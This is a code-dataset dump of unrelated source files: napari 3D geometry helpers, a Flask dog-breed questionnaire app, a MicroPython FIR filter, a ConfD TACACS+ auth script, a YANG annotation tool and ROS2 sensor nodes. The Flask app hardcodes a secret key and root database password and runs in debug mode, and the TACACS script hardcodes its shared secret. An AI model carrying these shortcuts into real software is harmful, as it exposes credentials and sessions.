line_plane_direction * plane_normal, axis=1
)
# project line direction onto the plane normal
line_direction_on_plane_normal = np.sum(
line_direction * plane_normal, axis=1
)
# find scale factor for line direction
scale_factor = line_plane_on_plane_normal / line_direction_on_plane_normal
# if plane_position.ndim == 2:
repeated_line_position = np.repeat(
line_position[np.newaxis, :], len(scale_factor), axis=0
)
repeated_line_direction = np.repeat(
line_direction[np.newaxis, :], len(scale_factor), axis=0
)
return repeated_line_position + (
np.expand_dims(scale_factor, axis=1) * repeated_line_direction
)
def intersect_line_with_triangles(
line_point: np.ndarray, line_direction: np.ndarray, triangles: np.ndarray
) -> np.ndarray:
"""Find the intersection of a ray with a set of triangles.
This function does not test whether the ray intersects the triangles, so you should
have tested for intersection first. See line_in_triangles_3d() for testing for
intersection.
Parameters
----------
line_point : np.ndarray
The (3,) array containing the starting point of the ray.
line_direction : np.ndarray
The (3,) array containing the unit vector in the direction of the ray.
triangles : np.ndarray
The 3D vertices of the triangles. Should be (n, 3, 3) for n triangles. Axis 1
        indexes each vertex and axis 2 contains the coordinates. That is, to access the
0th vertex from triangle index 3, one would use: triangles[3, 0, :].
Returns
-------
intersection_points : np.ndarray
(n, 3) array containing the point at which the specified ray intersects
        each triangle.
"""
edge_1 = triangles[:, 1, :] - triangles[:, 0, :]
edge_2 = triangles[:, 2, :] - triangles[:, 0, :]
triangle_normals = np.cross(edge_1, edge_2)
triangle_normals = triangle_normals / np.expand_dims(
np.linalg.norm(triangle_normals, axis=1), 1
)
intersection_points = intersect_line_with_multiple_planes_3d(
line_position=line_point,
line_direction=line_direction,
plane_position=triangles[:, 0, :],
plane_normal=triangle_normals,
)
return intersection_points
def point_in_quadrilateral_2d(
point: np.ndarray, quadrilateral: np.ndarray
) -> bool:
"""Determines whether a point is inside a 2D quadrilateral.
Parameters
----------
point : np.ndarray
(2,) array containing coordinates of a point.
quadrilateral : np.ndarray
(4, 2) array containing the coordinates for the 4 corners
of a quadrilateral. The vertices should be in clockwise order
such that indexing with [0, 1, 2], and [0, 2, 3] results in
the two non-overlapping triangles that divide the
quadrilateral.
Returns
-------
"""
triangle_vertices = np.stack(
(quadrilateral[[0, 1, 2]], quadrilateral[[0, 2, 3]])
)
in_triangles = inside_triangles(triangle_vertices - point)
if in_triangles.sum() < 1:
return False
else:
return True
def line_in_quadrilateral_3d(
line_point: np.ndarray,
line_direction: np.ndarray,
quadrilateral: np.ndarray,
) -> bool:
"""Determine if a line goes tbrough any of a set of quadrilaterals.
For example, this could be used to determine if a click was
in a specific face of a bounding box.
Parameters
----------
line_point : np.ndarray
(3,) array containing the location that was clicked. This
should be in the same coordinate system as the vertices.
line_direction : np.ndarray
(3,) array describing the direction camera is pointing in
the scene. This should be in the same coordinate system as
the vertices.
quadrilateral : np.ndarray
(4, 3) array containing the coordinates for the 4 corners
of a quadrilateral. The vertices should be in clockwise order
such that indexing with [0, 1, 2], and [0, 2, 3] results in
the two non-overlapping triangles that divide the quadrilateral.
Returns
-------
in_region : bool
True if the click is in the region specified by vertices.
"""
# project the vertices of the bound region on to the view plane
vertices_plane, _ = project_points_onto_plane(
points=quadrilateral,
plane_point=line_point,
plane_normal=line_direction,
)
# rotate the plane to make the triangles 2D
rotated_vertices, rotation_matrix = rotate_points(
points=vertices_plane,
current_plane_normal=line_direction,
new_plane_normal=[0, 0, 1],
)
quadrilateral_2D = rotated_vertices[:, :2]
click_pos_2D = rotation_matrix.dot(line_point)[:2]
return point_in_quadrilateral_2d(click_pos_2D, quadrilateral_2D)
def line_in_triangles_3d(
line_point: np.ndarray, line_direction: np.ndarray, triangles: np.ndarray
):
"""Determine if a line goes through any of a set of triangles.
For example, this could be used to determine if a click was
in a triangle of a mesh.
Parameters
----------
line_point : np.ndarray
(3,) array containing the location that was clicked. This
should be in the same coordinate system as the vertices.
line_direction : np.ndarray
(3,) array describing the direction camera is pointing in
the scene. This should be in the same coordinate system as
the vertices.
triangles : np.ndarray
(n, 3, 3) array containing the coordinates for the 3 corners
of n triangles.
Returns
-------
in_triangles : np.ndarray
        (n,) boolean array that is True if the ray intersects the triangle
"""
vertices = triangles.reshape((-1, triangles.shape[2]))
# project the vertices of the bound region on to the view plane
vertices_plane, _ = project_points_onto_plane(
points=vertices, plane_point=line_point, plane_normal=line_direction
)
# rotate the plane to make the triangles 2D
rotation_matrix = rotation_matrix_from_vectors_3d(
line_direction, [0, 0, 1]
)
rotated_vertices = vertices_plane @ rotation_matrix.T
rotated_vertices_2d = rotated_vertices[:, :2]
rotated_triangles_2d = rotated_vertices_2d.reshape(-1, 3, 2)
line_pos_2D = rotation_matrix.dot(line_point)[:2]
return inside_triangles(rotated_triangles_2d - line_pos_2D)
def find_front_back_face(
click_pos: np.ndarray, bounding_box: np.ndarray, view_dir: np.ndarray
):
"""Find the faces of an axis aligned bounding box a
click intersects with.
Parameters
----------
click_pos : np.ndarray
(3,) array containing the location that was clicked.
bounding_box : np.ndarray
(N, 2), N=ndim array with the min and max value for each dimension of
        the bounding box. The bounding box is taken from the last
three rows, which are assumed to be in order (z, y, x).
This should be in the same coordinate system as click_pos.
view_dir
(3,) array describing the direction camera is pointing in
the scene. This should be in the same coordinate system as click_pos.
Returns
-------
front_face_normal : np.ndarray
The (3,) normal vector of the face closest to the camera the click
intersects with.
back_face_normal : np.ndarray
The (3,) normal vector of the face farthest from the camera the click
intersects with.
"""
front_face_normal = None
back_face_normal = None
bbox_face_coords = bounding_box_to_face_vertices(bounding_box)
for k, v in FACE_NORMALS.items():
if (np.dot(view_dir, v) + 0.001) < 0:
if line_in_quadrilateral_3d(
click_pos, view_dir, bbox_face_coords[k]
):
front_face_normal = v
elif (np.dot(view_dir, v) + 0.001) > 0:
if line_in_quadrilateral_3d(
click_pos, view_dir, bbox_face_coords[k]
):
back_face_normal = v
if front_face_normal is not None and back_face_normal is not None:
# stop looping if both the front and back faces have been found
break
return front_face_normal, back_face_normal
def intersect_line_with_axis_aligned_bounding_box_3d(
line_point: np.ndarray,
line_direction: np.ndarray,
bounding_box: np.ndarray,
face_normal: np.ndarray,
):
"""Find the intersection of a ray with the specified face of an
axis-aligned bounding box.
Parameters
----------
face_normal : np.ndarray
The (3,) normal vector of the face the click intersects with.
line_point : np.ndarray
(3,) array containing the location that was clicked.
bounding_box : np.ndarray
(N, 2), N=ndim array with the min and max value for each dimension of
        the bounding box. The bounding box is taken from the last
three rows, which are assumed to be in order (z, y, x).
This should be in the same coordinate system as click_pos.
line_direction
(3,) array describing the direction camera is pointing in
the scene. This should be in the same coordinate system as click_pos.
Returns
-------
intersection_point : np.ndarray
(3,) array containing the coordinate for the intersection of the click on
the specified face.
"""
front_face_coordinate = face_coordinate_from_bounding_box(
bounding_box, face_normal
)
intersection_point = np.squeeze(
intersect_line_with_axis_aligned_plane(
front_face_coordinate,
face_normal,
line_point,
-line_direction,
)
)
return intersection_point
def distance_between_point_and_line_3d(
point: np.ndarray, line_position: np.ndarray, line_direction: np.ndarray
):
"""Determine the minimum distance between a point and a line in 3D.
Parameters
----------
point : np.ndarray
(3,) array containing coordinates of a point in 3D space.
line_position : np.ndarray
(3,) array containing coordinates of a point on a line in 3D space.
line_direction : np.ndarray
(3,) array containing a vector describing the direction of a line in
3D space.
Returns
-------
distance : float
The minimum distance between `point` and the line defined by
`line_position` and `line_direction`.
"""
line_direction_normalized = line_direction / np.linalg.norm(line_direction)
projection_on_line_direction = np.dot(
        (point - line_position), line_direction_normalized
)
closest_point_on_line = (
line_position
+ line_direction_normalized * projection_on_line_direction
)
distance = np.linalg.norm(point - closest_point_on_line)
return distance
def find_nearest_triangle_intersection(
ray_position: np.ndarray, ray_direction: np.ndarray, triangles: np.ndarray
) -> Tuple[Optional[int], Optional[np.ndarray]]:
"""Given an array of triangles, find the index and intersection location
of a ray and the nearest triangle.
    This returns only the triangle closest to the ray_position.
Parameters
----------
ray_position : np.ndarray
The coordinate of the starting point of the ray.
ray_direction : np.ndarray
A unit vector describing the direction of the ray.
triangles : np.ndarray
(N, 3, 3) array containing the vertices of the triangles.
Returns
-------
closest_intersected_triangle_index : int
The index of the intersected triangle.
intersection : np.ndarray
The coordinate of where the ray intersects the triangle.
"""
inside = line_in_triangles_3d(
line_point=ray_position,
line_direction=ray_direction,
triangles=triangles,
)
n_intersected_triangles = np.sum(inside)
if n_intersected_triangles == 0:
return None, None
    # find the intersection points for the intersected triangles
intersected_triangles = triangles[inside]
intersection_points = intersect_line_with_triangles(
line_point=ray_position,
line_direction=ray_direction,
triangles=intersected_triangles,
)
# find the intersection closest to the start point of the ray and return
start_to_intersection = intersection_points - ray_position
distances = np.linalg.norm(start_to_intersection, axis=1)
closest_triangle_index = np.argmin(distances)
intersected_triangle_indices = np.argwhere(inside)
closest_intersected_triangle_index = intersected_triangle_indices[
closest_triangle_index
][0]
intersection = intersection_points[closest_triangle_index]
return closest_intersected_triangle_index, intersection
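# Editor's usage sketch (illustrative only, not part of the original napari module):
# cast a ray along the first axis through a single triangle lying in the plane
# where the first coordinate equals 5; the triangle index and hit point come back.
#   >>> tri = np.array([[[5.0, 0.0, 0.0], [5.0, 10.0, 0.0], [5.0, 0.0, 10.0]]])
#   >>> idx, hit = find_nearest_triangle_intersection(
#   ...     ray_position=np.array([0.0, 2.0, 2.0]),
#   ...     ray_direction=np.array([1.0, 0.0, 0.0]),
#   ...     triangles=tri)
#   # idx -> 0, hit -> array([5., 2., 2.])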
``` |
{
"source": "jojo-en-code/foundations-project-template",
"score": 3
} |
#### File: foundations-project-template/dog_finder/score_analyzer.py
```python
def calculate_range(dog_breed_list, score):
dog_breed_range_list = []
for dog_breed in dog_breed_list:
min_score=dog_breed.min_score
max_score=dog_breed.max_score
if score > min_score and score < max_score:
dog_name=dog_breed.name
dog_breed_range_list.append(dog_name)
return dog_breed_range_list
```
#### File: foundations-project-template/dog_finder/website.py
```python
from flask import Flask
from flask import render_template, request, flash, redirect, url_for, jsonify
from os import path
import pymysql
from werkzeug.security import generate_password_hash, check_password_hash
from flask_login import LoginManager
from flask_login import login_user, login_required, logout_user, current_user
from dog_finder.models import db, User, Dog_breed
from dog_finder.score_analyzer import calculate_range
app = Flask(__name__)
app.config['SECRET_KEY'] = 'dqddececcad efde'
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:password@localhost/dbschema'
db.init_app(app)
app.config.from_pyfile("config.py")
@app.route('/')
def home():
return render_template('home.html', page_title="Danas Dog Finder")
@app.route('/questionnair', methods=['GET', 'POST'])
@login_required
def questionnair():
if request.method == "POST":
# getting input from form for first question
score = request.json["score"]
dog_breed = Dog_breed()
dog_breed_list= dog_breed.query.all()
result = calculate_range(dog_breed_list, score)
return jsonify({"score":score,"result": result})
return render_template('questionnair.html', user=current_user, page_title="Questionnair")
@app.route('/login', methods=['GET', 'POST'])
def login():
if request.method == 'POST':
email = request.form.get('email')
password = request.form.get('password')
user = User.query.filter_by(email=email).first()
if user:
if check_password_hash(user.password, password):
flash('Logged in successfully!', category='success')
login_user(user, remember=True)
return redirect(url_for('home'))
else:
flash('Incorrect password, try again.', category='error')
else:
flash('Email does not exist.', category='error')
return render_template('login.html', user=current_user, page_title="Login")
@app.route('/logout')
@login_required
def logout():
logout_user()
return redirect(url_for('login'))
@app.route('/signup', methods=['GET', 'POST'])
def signup():
if request.method== 'POST':
email= request.form.get('email')
first_name= request.form.get('firstName')
password1= request.form.get('<PASSWORD>')
password2= request.form.get('<PASSWORD>')
user = User.query.filter_by(email=email).first()
if user:
flash('Email already exists.', category='error')
elif len(email) < 4:
flash("Email must be greater than 4 characters", category='error')
elif len(first_name) < 2:
flash("First Name must be greater than 2 characters", category='error')
elif len(password1) < 7:
flash("Password must be greater than 7 characters", category='error')
elif password1 != password2:
flash("Passwords dont match", category='error')
else:
new_user = User(email=email, first_name=first_name, password=generate_password_hash(password1, method='sha256'))
# new_user = User(email=email, first_name=first_name, password=<PASSWORD>)
db.session.add(new_user)
db.session.commit()
login_user(new_user, remember=True)
flash("Account was created", category='success')
return redirect(url_for('home'))
return render_template('signup.html', user=current_user, page_title="Sign Up")
# @app.route('/score_comp', methods=["POST"])
# def score_comp():
# # user_score = request.form.get("student_id")
# # cur = mysql.connection.cursor()
# # cur.execute("DELETE FROM students WHERE student_id = %s", (student_id,)
# # conn.commit()
# # score = request.args.get('score', 0, type=json)
# return jsonify(score)
# return string.Format("your score: " + score)
# print(score)
# return jsonify(status="success")
# # return render_template('questionnair.html', user=current_user)
login_manager = LoginManager()
login_manager.login_view = 'login'
login_manager.init_app(app)
@login_manager.user_loader
def load_user(id):
return User.query.get(int(id))
if __name__ == "__main__":
app.run(host="localhost", port=8080, debug=True)
``` |
{
"source": "jojo-/filters4micropy",
"score": 4
} |
#### File: jojo-/filters4micropy/fir.py
```python
import math, cmath
class fir:
""" Class for an FIR filter"""
def __init__(self, a):
# a - list of coefficients [a0, a1, ..., an]
self._coeff = a
# Initalise the buffer
self._buffer = [0]*len(a)
# Start the counter
self._counter = 0
# Function to update the filter
def update(self, val):
# val - The new value from the sensor
# Store the new value
self._buffer[self._counter] = val
# Calculate the output
self._y = 0
for n in range(len(self._buffer)):
self._y += self._buffer[n] * self._coeff[n]
# Rotate the coefficients
self._coeff = self.rotate(self._coeff, 1)
# Update the counter
self._counter = self._counter - 1 if self._counter > 0 else len(self._buffer) - 1
# Return the output
return self._y
""" Function to rotate an array by k """
def rotate(self, arr, k):
return arr[k:]+arr[:k]
""" Function to get the current filter value """
def get(self):
return self._y
# Example implementation of the filters
if __name__ == '__main__':
import matplotlib.pyplot as plt
import numpy as np
import random
# Function to give a random noise variable
def noise(mag):
return mag * random.gauss(1, 1)
# Define the parameters for the fir filter
""" These must be determined beforehand to obtain the output you want """
a = [0.00037901217544093594,
0.003983243842986631,
0.010120005263499371,
0.010266967368121263,
-0.007027153056169479,
-0.03675557784754312,
-0.04509269415314178,
0.009995897563795745,
0.1325937532814218,
0.26476816876515974,
0.32220407747180513,
0.26476816876515974,
0.1325937532814218,
0.009995897563795745,
-0.04509269415314178,
-0.03675557784754312,
-0.007027153056169479,
0.010266967368121263,
0.010120005263499371,
0.003983243842986631,
0.00037901217544093594]
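    # Editor's note (assumption, not from the original project): tap sets like the
    # one above are normally designed offline. On a desktop machine with SciPy
    # available, a comparable 21-tap low-pass set could be produced with e.g.
    #   from scipy import signal
    #   a = list(signal.firwin(21, cutoff=20.0, fs=500))   # 20 Hz low-pass at Fs = 500 Hz
    # and the resulting values pasted into this MicroPython script as a plain list.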
# Initialise the filter
filter = fir(a)
# Create the dummy dataset
N = 1024 # Number of samples
Fs = 500 # Sample rate (samples/sec)
Ts = 1 / Fs # Sample period (sec)
# Time variable
t = np.linspace(0.0, N*Ts, N)
# Example output - two sinusoids
x = list(np.sin(5.0 * 2.0*np.pi*t) + 0.5*np.sin(2.0 * 2.0*np.pi*t))
# Add some Gaussian noise
y = [output + noise(0.1) for output in x]
# Start an empty list
filtered = []
# Cycle through the output and filter
for y_val in y:
# Update the filter
filter.update(y_val)
# Get and store the new filtered value
filtered_val = filter.get()
filtered.append(filtered_val)
# Plot the results
plt.figure(1)
plt.plot(t, y) # Noisy signal
plt.plot(t, filtered) # Filtered signal
plt.show()
``` |
{
"source": "jojohans/ConfD-App-Notes",
"score": 2
} |
#### File: tacacs_authentication/src/auth.py
```python
from tacacs_plus.client import TACACSClient
import socket
import sys
line = sys.stdin.readline()
line = line.replace("[", "")
line = line.replace("]", "")
token = line.split(";") # token[0] username, token[1] password
def get_av_pair(arguments, key, default=None):
ret = default
for av in arguments:
avf = av.split("=")
if avf[0] == key:
ret = avf[1]
break
return ret
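# Editor's usage sketch (illustrative only, not part of the original script):
# get_av_pair picks one attribute-value pair out of the authorization reply, e.g.
#   get_av_pair(["groups=admin", "uid=1000"], "groups")   -> "admin"
#   get_av_pair(["groups=admin"], "uid", default=9000)    -> 9000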
cli = TACACSClient('localhost', 49, 'testing123', timeout=10,
family=socket.AF_INET)
authen = cli.authenticate(token[0], token[1])
if authen.valid == True:
auth = cli.authorize(token[0], arguments=["service=tailf"])
groups = get_av_pair(auth.arguments, key="groups")
if groups != None:
uid = get_av_pair(auth.arguments, key="uid", default=9000)
gid = get_av_pair(auth.arguments, key="gid", default=100)
home = "/var/confd/homes/{}".format(token[0])
print("accept {} {} {} {}".format(groups, uid, gid, home))
else:
print(
"reject Cannot retrieve groups AV pair (tailf service) for user {}"
.format(token[0]))
else:
print("reject")
``` |
{
"source": "jojohans/ConfD-Demos",
"score": 2
} |
#### File: ann-stmt/app/tailf_ann_stmt.py
```python
import argparse
import os
import subprocess
from bs4 import BeautifulSoup
import re
from datetime import datetime
import copy
def gen_ann_module(name, ns, prefix):
revdate = datetime.today().strftime('%Y-%m-%d')
str = """<?xml version="1.0" encoding="utf-8"?>
<module>
<namespace uri="{}-ann"/>
<prefix value="{}-ann"/>
<import module="tailf-common">
<prefix value="tailf"/>
</import>
<revision date="{}">
<description>
<text>Initial revision</text>
</description>
</revision>
<tailf_prefix_annotate_module module_name="{}"/>
</module>""".format(ns,prefix,revdate,name)
return str
def add_stmt(node, ann_node, ann_soup):
if node.parent.name == "module" or node.parent.name == "submodule":
return ann_node
elif node.parent.name == "augment":
parent_ann_node = ann_soup.new_tag("tailf:annotate-statement", statement_path="{}[name=\'{}\']".format(node.parent.name, node.parent['target_node']))
else:
parent_ann_node = ann_soup.new_tag("tailf:annotate-statement", statement_path="{}[{}=\'{}\']".format(node.parent.name,
next(iter(node.parent.attrs)),
next(iter(node.parent.attrs.values()))))
parent_ann_node.append(ann_node)
return add_stmt(node.parent, parent_ann_node, ann_soup)
def tailf_ann_stmt(yang_file):
confd_dir = os.environ['CONFD_DIR']
yang_file_path = yang_file.rsplit('/', 1)
yang_path = yang_file_path[0]
yang_filename = yang_file_path[1]
ann_filename = "{}-ann.yang".format(yang_filename.rsplit('.', 1)[0])
result = subprocess.run(['python3', '/usr/local/bin/pyang', '-f', 'yin',
'-p', yang_path, '-p', confd_dir, yang_file],
stdout=subprocess.PIPE, encoding='utf-8')
yin_content = result.stdout
yin_content = yin_content.replace('tailf:', 'tailf_prefix_')
yin_content = yin_content.replace('name=', 'yname=')
yin_content = yin_content.replace('target-node=', 'target_node=')
yin_content = yin_content.replace('xmlns:', 'xmlns_')
yin_soup = BeautifulSoup(yin_content, "xml")
if yin_soup.module is not None:
annotate_module = gen_ann_module(yang_filename.rsplit('.', 1)[0],
yin_soup.module.find('namespace')['uri'],
yin_soup.module.find('prefix')['value'])
elif yin_soup.submodule is not None:
prefix = yin_soup.submodule.find('prefix')['value']
annotate_module = gen_ann_module(yang_filename.rsplit('.', 1)[0],
yin_soup.submodule["xmlns_{}".format(prefix)],
prefix)
else:
print("Error: Unknown module type. Neither a YANG module or submodule ")
return
ann_soup = BeautifulSoup(annotate_module, "xml")
for tailf_extension in yin_soup.find_all(re.compile('tailf_prefix_')):
if tailf_extension.parent is not None and tailf_extension.parent.name.startswith('tailf_prefix_') == False:
annotate_statements = add_stmt(tailf_extension, copy.copy(tailf_extension), ann_soup)
ann_soup.module.tailf_prefix_annotate_module.append(annotate_statements)
tailf_extension.decompose()
tailf_import = yin_soup.find('import', module='tailf-common')
if tailf_import is None:
create_ann_module = False
else:
create_ann_module = True
tailf_import.decompose()
tailf_ann_import = ann_soup.find('import', module='tailf-common')
if yin_soup.module is not None:
ann_soup.module.attrs = copy.copy(yin_soup.module.attrs)
for module_import in yin_soup.module.find_all('import', recursive=False):
tailf_ann_import.insert_before(copy.copy(module_import))
else:
ann_soup.module.attrs = copy.copy(yin_soup.submodule.attrs)
for module_import in yin_soup.submodule.find_all('import', recursive=False):
tailf_ann_import.insert_before(copy.copy(module_import))
ann_soup.module['yname'] = "{}-ann".format(ann_soup.module['yname'])
yin_soup_str = str(yin_soup)
yin_soup_str = yin_soup_str.replace('tailf_prefix_', 'tailf:')
yin_soup_str = yin_soup_str.replace('yname=', 'name=')
yin_soup_str = yin_soup_str.replace('target_node=', 'target-node=')
yin_soup_str = yin_soup_str.replace('xmlns_', 'xmlns:')
result = subprocess.run(['python3', '/usr/local/bin/pyang', '-f',
'yang', '-p', yang_path, '-p', confd_dir],
stdout=subprocess.PIPE, input=yin_soup_str,
encoding='utf-8')
yang_content = result.stdout
with open("yang/{}".format(yang_filename), "w") as fp:
fp.write(str(yang_content))
fp.close()
if create_ann_module is True:
ann_soup_str = str(ann_soup)
ann_soup_str = ann_soup_str.replace('tailf_prefix_', 'tailf:')
ann_soup_str = ann_soup_str.replace('annotate_module', 'annotate-module')
ann_soup_str = ann_soup_str.replace('module_name=', 'module-name=')
ann_soup_str = ann_soup_str.replace('statement_path=', 'statement-path=')
ann_soup_str = ann_soup_str.replace('yname=', 'name=')
ann_soup_str = ann_soup_str.replace('target_node=', 'target-node=')
ann_soup_str = ann_soup_str.replace('xmlns_', 'xmlns:')
result = subprocess.run(['python3', '/usr/local/bin/pyang', '-f',
'yang', '--ignore-error=UNUSED_IMPORT', '-p',
yang_path, '-p', confd_dir], stdout=subprocess.PIPE,
input=ann_soup_str, encoding='utf-8')
ann_content = result.stdout
with open("yang/{}".format(ann_filename), "w") as fp:
fp.write(str(ann_content))
fp.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="",
formatter_class=argparse.RawTextHelpFormatter
)
parser.add_argument('filename', nargs=1, type=str,
help='<file> YANG module to be sanitized')
args = parser.parse_args()
tailf_ann_stmt(args.filename[0])
``` |
{
"source": "JoJoHTM/Sensors_drivers_BROV2",
"score": 3
} |
#### File: sensor_barometer/sensor_barometer/barometer_data_publisher_node.py
```python
from rclpy.node import Node
# ms5837 needed in order to utilize the BlueRobotics MS5837 Python Library which must be installed
from sensor_barometer import ms5837
from sensor_interfaces.msg import Barometer
import time
import re, uuid
class BarometerDataPublisher(Node):
# Initializer
def __init__(self):
super().__init__('BarometerDataPublisher')
self.publisher_ = self.create_publisher(Barometer, 'barometer_data', 10) # Creates a publisher over the topic barometer_data
read_period = 2 # Does a reading every 2 seconds
self.timer = self.create_timer(read_period, self.barometer_read_and_publish)
self.sensor = ms5837.MS5837_30BA()
# self.sensor.setFluidDensity() # Configuring fluid density for fresh or saltwater. Defaulting to fresh water
if not self.sensor.init():
# If sensor can not be detected
print("Sensor could not be initialized")
exit(1)
def barometer_read_and_publish(self):
# Custom barometer message to publish. Can be found in the sensor_interfaces.
msg = Barometer()
# Adding a way to read the time
tim = time.localtime()
msg.local_time = time.strftime("%H:%M",tim)
# Getting the mac address of the system
msg.mac = ':'.join(re.findall('..','%012x' % uuid.getnode()))
# Reading barometer and loading data into custom message
if self.sensor.read():
msg.depth = self.sensor.depth() # Depth in meters using the fluid density (kg/m^3) configured by setFluidDensity()
msg.pressure_mbar = self.sensor.pressure() # Default is mbar (no arguments)
msg.pressure_psi = self.sensor.pressure(ms5837.UNITS_psi) # Request psi
else:
print("Sensor read failed!")
exit(1)
# Publishing message and logging data sent over the topic /barometer_data
self.publisher_.publish(msg)
self.get_logger().info('Mac: %s Depth: %0.2f m\tP: %0.1f mbar %0.3f psi %s' % (msg.mac,
msg.depth,
msg.pressure_mbar,
msg.pressure_psi,
msg.local_time))
```
#### File: sensor_battery/sensor_battery/battery_data_publisher_node_main.py
```python
import rclpy
from sensor_battery import battery_data_publisher_node as node
def main(args=None):
rclpy.init(args=args)
# Construct the publisher
battery_data_publisher = node.BatteryDataPublisher()
# Reading and publishing data at defined rate (2 seconds)
rclpy.spin(battery_data_publisher)
# Clean up when script is stopped
battery_data_publisher.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
```
#### File: sensor_battery/sensor_battery/battery_data_publisher_node.py
```python
from rclpy.node import Node
from sensor_battery import ads1x15
from sensor_interfaces.msg import Battery
class BatteryDataPublisher(Node):
# Initialize
def __init__(self):
super().__init__('BatteryDataPublisher')
        self.publisher_ = self.create_publisher(Battery, 'battery_data', 10) # Creates a publisher over the topic battery_data
read_period = 2 # Does a reading every 2 seconds
self.timer = self.create_timer(read_period, self.battery_read_and_publish)
self.sensor = ads1x15.ADS1x15()
def battery_read_and_publish(self):
# Custom battery message to publish. Can be found in the sensor_interfaces.
msg = Battery()
# Choose a gain of 1 for reading voltages from 0 to 4.09V.
# Or pick a different gain to change the range of voltages that are read:
# - 2/3 = +/-6.144V
# - 1 = +/-4.096V
# - 2 = +/-2.048V
# - 4 = +/-1.024V
# - 8 = +/-0.512V
# - 16 = +/-0.256V
# See table 3 in the ADS1015/ADS1115 datasheet for more info on gain.
GAIN = 1
# TODO:
# Get readings from ADS1115 and convert to proper values.(https://discuss.bluerobotics.com/t/need-help-connecting-the-power-sense-module-r2-to-a-arduino/4679)
# Compare these values to a graph of battery lifecycle to determine battery percentage.
        adc_value0 = self.sensor.read_adc(0, gain=GAIN) #Reads the ADC-value on channel A0 (assumes the ads1x15 helper exposes read_adc())
        self.publisher_.publish(msg)
        self.get_logger().info('ADC channel 0 raw value: %d' % adc_value0) # placeholder log until the battery-percentage conversion above is implemented
```
#### File: sensor_oxygen/sensor_oxygen/oxygen_data_publisher_node_main.py
```python
import rclpy
from sensor_oxygen import oxygen_data_publisher_node as node
def main(args=None):
rclpy.init(args=args)
# Construct the publisher
oxygen_data_publisher = node.OxygenDataPublisher()
# Reading and publishing data at defined rate (0.1 seconds)
rclpy.spin(oxygen_data_publisher)
# Clean up when script is stopped
oxygen_data_publisher.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
```
#### File: sensor_salinity/sensor_salinity/salinity_data_publisher_node.py
```python
from rclpy.node import Node
# catlas01 needed in order to utilize the conductivity/salinity sensor driver, which must be installed
from sensor_salinity import catlas01
from sensor_interfaces.msg import Salinity
import time
import re, uuid
class SalinityDataPublisher(Node):
# Initializer
def __init__(self):
super().__init__('SalinityDataPublisher')
self.publisher_ = self.create_publisher(Salinity, 'salinity_data', 10) # Creates a publisher over the topic salinity_data
read_period = 2 # Does a reading every 2 seconds
self.timer = self.create_timer(read_period, self.salinity_read_and_publish)
self.sensor = catlas01.CATLAS01()
# if not self.sensor.init():
# print("Sensor could not be initialized")
# exit(1)
def salinity_read_and_publish(self):
        # Custom conductivity message to publish. Can be found in the sensor_interfaces.
msg = Salinity()
# Adding a way to read the time
tim = time.localtime()
msg.local_time = time.strftime("%H:%M",tim)
# Getting the mac address of the system
msg.mac = ':'.join(re.findall('..','%012x' % uuid.getnode()))
# Reading salinity and loading data into custom message
if self.sensor.read():
msg.salinity_value = self.sensor._salinity
else:
print("Sensor read failed!")
exit(1)
# Publishing message and logging data sent over the topic /salinity_data
self.publisher_.publish(msg)
self.get_logger().info('Mac: %s O: %0.2f µs/cm %s' % (msg.mac,
msg.salinity_value,
msg.local_time))
```
#### File: sensor_thermometer/sensor_thermometer/thermometer_data_publisher_node_main.py
```python
import rclpy
from sensor_thermometer import thermometer_data_publisher_node as node
def main(args=None):
rclpy.init(args=args)
# Construct the publisher
thermometer_data_publisher = node.ThermometerDataPublisher()
# Reading and publishing data at defined rate (2 seconds)
rclpy.spin(thermometer_data_publisher)
# Clean up when script is stopped
thermometer_data_publisher.destroy_node()
rclpy.shutdown()
if __name__ == '__main__':
main()
``` |
{
"source": "jojoin/cutout",
"score": 2
} |
#### File: cutout/cutout/common.py
```python
import urllib
import urllib.request
import urllib.parse
import os.path
import sys
import re
import time
from .util import sec2time, parse_argv
#default_encoding = sys.getfilesystemencoding()
#if default_encoding.lower() == 'ascii':
# default_encoding = 'utf-8'
# the old function
## ProgressBar progress-bar component
# For brevity, the comments below refer to the progress bar simply as "bar"
class ProgressBar:
    def __init__(self
        , piece_total=0 #total amount of data
        , label='' #title displayed before the bar
        , info='' #description displayed after the bar
        ):
        self.displayed = False #whether the bar has been displayed yet
        self.piece_total = piece_total
        self.piece_current = 0
        self.label = label
        self.face() #appearance
        self.start() #initialise the data
        self.filtrates = {} #registered data-processing callbacks (renamed so it does not shadow the filtrate() method)
    # Set data
    def set(self
        , piece_total=0 #total amount of data
        ):
        if piece_total>0:
            self.piece_total = piece_total
    # Configure the bar's UI appearance
    def face(self
        , ui_wl='[' #wrapper symbol on the left of the bar
        , ui_wr=']' #wrapper symbol on the right of the bar
        , ui_fn='=' #character for the completed part of the bar
        , ui_lk=' ' #character for the unfinished part of the bar
        , ui_hd='>' #head of the completed part of the bar
        , ui_leg=50 #length of the bar
        , ui_split=' ' #separator between the displayed items
        , it_time=True #whether to show the elapsed time
        , it_piece=True #whether to show the piece count
        , it_percent=True #whether to show the current percentage
        , it_speed=True #whether to show the speed
        , it_perspeed=True #whether to show the percentage speed
        , sh_piece_division = 1 #divisor applied when displaying pieces
        , sh_piece_unit = '' #unit shown for pieces
        ):
self.ui_wl = ui_wl
self.ui_wr = ui_wr
self.ui_fn = ui_fn
self.ui_lk = ui_lk
self.ui_hd = ui_hd
self.ui_leg = ui_leg
self.ui_split = ui_split
self.it_time = it_time
self.it_piece = it_piece
self.it_percent = it_percent
self.it_speed = it_speed
self.it_perspeed = it_perspeed
self.sh_piece_division = sh_piece_division
self.sh_piece_unit = sh_piece_unit
    # Start the bar (initialise some data)
    def start(self):
        self.piece_current = 0 #current amount of data
        self.percent_current = 0 #current percentage, 0~100
        self.start_time = int(time.time()) #time the bar was started
        self.isDone = False
    # New progress data arrives
    # @type kind of progress: percent = percentage, piece = amount of data
    # @mode how to apply the progress: add = accumulate, set = assign
    def step(self,step,type="piece",mode="add"):
        if type=='percent':
            if mode=='add':
                self.percent_current += step
            elif mode=='set':
                self.percent_current = step
        elif type=='piece':
            if mode=='add':
                self.piece_current += step
            elif mode=='set':
                self.piece_current = step
        # compute the percentage
        if self.piece_total > 0:
            self.percent_current = self.piece_current/self.piece_total*100
        # refresh the display
        self.update()
        # check whether we are done
        if self.percent_current >= 100:
